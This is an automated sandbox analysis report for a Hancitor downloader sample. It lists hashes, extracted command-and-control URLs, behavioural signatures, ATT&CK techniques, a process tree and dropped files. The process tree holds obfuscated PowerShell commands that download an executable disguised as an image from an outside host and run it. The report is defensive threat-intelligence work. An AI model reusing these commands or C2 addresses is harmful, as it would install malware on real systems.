hancitor | 73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71

Analysis

max time kernel
121s
max time network
129s
platform
windows7_x64
resource
win7v20210410
submitted
08-07-2021 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0708_5355150121.xll.dll
Size

23KB
MD5

41e0318dfdb1c180a375a7efc712649e
SHA1

f0c230010c7b85544c25879d4daf74479360e1bc
SHA256

73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
SHA512

b20ec32ba9f7269deda4f70e655bb7a105dde896524bfd9c788605f2a0a26bc3bc7ddceed93c4f7b14404a65107647a9b9840c8adec32c12d92138b69805cc17

Score

10^/10

hancitor 0707in2_wvcr downloader

Malware Config

Extracted

Family

hancitor

Botnet

0707in2_wvcr

http://sudepallon.com/8/forum.php

http://anspossthrly.ru/8/forum.php

http://thentabecon.ru/8/forum.php

Signatures

Hancitor
Hancitor is downloader used to deliver other malware families.
downloader hancitor
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exepowershell.exe

flow pid process

3 1936 rundll32.exe
8 1416 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

snd32sys.exe

pid process

1608 snd32sys.exe
Loads dropped DLL 2 IoCs

Processes:

powershell.exe

pid process

1748 powershell.exe
1748 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exesnd32sys.exe

pid process

1748 powershell.exe
1748 powershell.exe
1416 powershell.exe
1416 powershell.exe
1608 snd32sys.exe
1608 snd32sys.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1748 powershell.exe
Token: SeDebugPrivilege 1416 powershell.exe

flow	pid	process
3	1936	rundll32.exe
8	1416	powershell.exe

pid	process
1608	snd32sys.exe

pid	process
1748	powershell.exe
1748	powershell.exe

flow	ioc
10	api.ipify.org

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1748	powershell.exe
1748	powershell.exe
1416	powershell.exe
1416	powershell.exe
1608	snd32sys.exe
1608	snd32sys.exe

description	pid	process
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

rundll32.exerundll32.exemshta.exepowershell.exe

description	pid	process	target process
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 368 wrote to memory of 1936	368	rundll32.exe	rundll32.exe
PID 1936 wrote to memory of 1996	1936	rundll32.exe	mshta.exe
PID 1936 wrote to memory of 1996	1936	rundll32.exe	mshta.exe
PID 1936 wrote to memory of 1996	1936	rundll32.exe	mshta.exe
PID 1936 wrote to memory of 1996	1936	rundll32.exe	mshta.exe
PID 1996 wrote to memory of 1748	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 1748	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 1748	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 1748	1996	mshta.exe	powershell.exe
PID 1748 wrote to memory of 1416	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1416	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1416	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1416	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1608	1748	powershell.exe	snd32sys.exe
PID 1748 wrote to memory of 1608	1748	powershell.exe	snd32sys.exe
PID 1748 wrote to memory of 1608	1748	powershell.exe	snd32sys.exe
PID 1748 wrote to memory of 1608	1748	powershell.exe	snd32sys.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\0708_5355150121.xll.dll,#1
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\res32.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpASs -NOp -w 1 WGeT "http://srand04rf.ru/08.jpg " -OuTfIle c:\Users\Public\snd32sys.exe
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Users\Public\snd32sys.exe
"C:\Users\Public\snd32sys.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1608

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
9b8af7db7e9d0ad465db68d1e94fe95f

SHA1
b111eb0fcc849e25a9de7e325e0f69f7a6a3ce27

SHA256
9973949f1983e2bba98d3696b8377787fc77dfe0d6f3825a53aabd5407e77d72

SHA512
d22be5f3d3cbf19b702696d935344959ff6ddfd28f5d13be70b9345d8f55299c8947c9fd494052d1e97cbff4a679bf857d66fa689d7fbc823905a059d3e24779

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
0bf9d994ee57c7e233234a32a3e59ca6

SHA1
e3b0cfe1cb2f389f5e2950620089b16a97c6dba2

SHA256
e0e67967f1582a9497534dabccb63b675131e89dae12f7cd3427fc304a44c862

SHA512
30392692e709396b97cb0c473648ad740ab62be87789d7f57cc9c1023e1106ea71d09ba03612fae53c79f92c956d6f5a671f622330860c73179d9c26291d8a69

Download Submit
C:\Users\Public\res32.hta
MD5
71999a9d2f15e164c9b1fa926aa6444b

SHA1
c1fbd2b6458b474a208b6cc710951940c9290e5c

SHA256
da92436d2bbcdef52b11ace6e2e063e9971cefc074d194550bd425305c97cdd5

SHA512
298eaab6d157e81bb738b1605285a0d14b05ae3656f1bbf72c4921c78b74be7048b6744144469cb4ef48f4d4d233f794c366f192765a4f193c48b2de2eff4c27

Download Submit
C:\Users\Public\snd32sys.exe
MD5
ed1921467f6784af6bdca40a06a541b5

SHA1
63b70725c3298d5fa17277ec64c77a4b6fbcf697

SHA256
3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

SHA512
a30779d84521049f4ceba11b0f0b16430db8a38ff38ab540585c9ae89d7214655e0c5c246e21e97ab65d8f3dc0d472ddb8bda1e01af82e632c66a2ccd159f020

Download Submit
C:\Users\Public\snd32sys.exe
MD5
ed1921467f6784af6bdca40a06a541b5

SHA1
63b70725c3298d5fa17277ec64c77a4b6fbcf697

SHA256
3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

SHA512
a30779d84521049f4ceba11b0f0b16430db8a38ff38ab540585c9ae89d7214655e0c5c246e21e97ab65d8f3dc0d472ddb8bda1e01af82e632c66a2ccd159f020

Download Submit
\Users\Public\snd32sys.exe
MD5
ed1921467f6784af6bdca40a06a541b5

SHA1
63b70725c3298d5fa17277ec64c77a4b6fbcf697

SHA256
3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

SHA512
a30779d84521049f4ceba11b0f0b16430db8a38ff38ab540585c9ae89d7214655e0c5c246e21e97ab65d8f3dc0d472ddb8bda1e01af82e632c66a2ccd159f020

Download Submit
\Users\Public\snd32sys.exe
MD5
ed1921467f6784af6bdca40a06a541b5

SHA1
63b70725c3298d5fa17277ec64c77a4b6fbcf697

SHA256
3db14214a9eb98b3b5abffcb314c808a25ed82456ce01251d31e8ea960f6e4e6

SHA512
a30779d84521049f4ceba11b0f0b16430db8a38ff38ab540585c9ae89d7214655e0c5c246e21e97ab65d8f3dc0d472ddb8bda1e01af82e632c66a2ccd159f020

Download Submit
memory/1416-96-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/1416-78-0x0000000001EA0000-0x0000000002AEA000-memory.dmp

Filesize
12.3MB

Download
memory/1416-83-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/1416-88-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/1416-89-0x0000000006260000-0x0000000006261000-memory.dmp

Filesize
4KB

Download
memory/1416-97-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1416-98-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1416-72-0x0000000000000000-mapping.dmp

Download
memory/1608-114-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1608-112-0x0000000000080000-0x000000000008A000-memory.dmp

Filesize
40KB

Download
memory/1608-110-0x0000000000000000-mapping.dmp

Download
memory/1748-69-0x0000000004882000-0x0000000004883000-memory.dmp

Filesize
4KB

Download
memory/1748-68-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/1748-67-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/1748-66-0x0000000000520000-0x0000000000521000-memory.dmp

Filesize
4KB

Download
memory/1748-106-0x00000000056D0000-0x00000000056D1000-memory.dmp

Filesize
4KB

Download
memory/1748-64-0x0000000000000000-mapping.dmp

Download
memory/1748-70-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1748-71-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1936-60-0x0000000076661000-0x0000000076663000-memory.dmp

Filesize
8KB

Download
memory/1936-59-0x0000000000000000-mapping.dmp

Download
memory/1996-63-0x00000000031C0000-0x00000000031C1000-memory.dmp

Filesize
4KB

Download
memory/1996-61-0x0000000000000000-mapping.dmp

Download